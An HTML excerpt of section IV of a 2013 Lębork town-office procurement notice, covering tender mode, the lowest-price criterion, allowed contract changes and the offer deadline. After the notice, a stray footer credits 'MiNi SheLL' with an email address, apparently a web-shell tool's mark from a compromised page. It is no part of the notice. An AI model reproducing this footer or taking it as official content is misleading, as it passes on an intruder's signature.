<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmianę warunków umowy w formie aneksu w następujących przypadkach:
a) w zakresie aktualizacji rozwiązań ze względu na zmiany w obowiązującym prawie, lub gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem umowy,
b) w zakresie terminów realizacji poszczególnych etapów przedmiotu zamówienia ze względu  na okoliczności wynikające z przyczyn obiektywnych, na które strony umowy nie mają wpływu,
c) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa    w zakresie mającym wpływ na realizację umowy (np. zmiana stawki podatku VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.lebork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lęborku ul. Armii Krajowej 14 pok. 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2013 godzina 10:00, miejsce: Kancelaria Ogólna Urzędu Miejskiego w Lęborku ul. Armii Krajowej 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com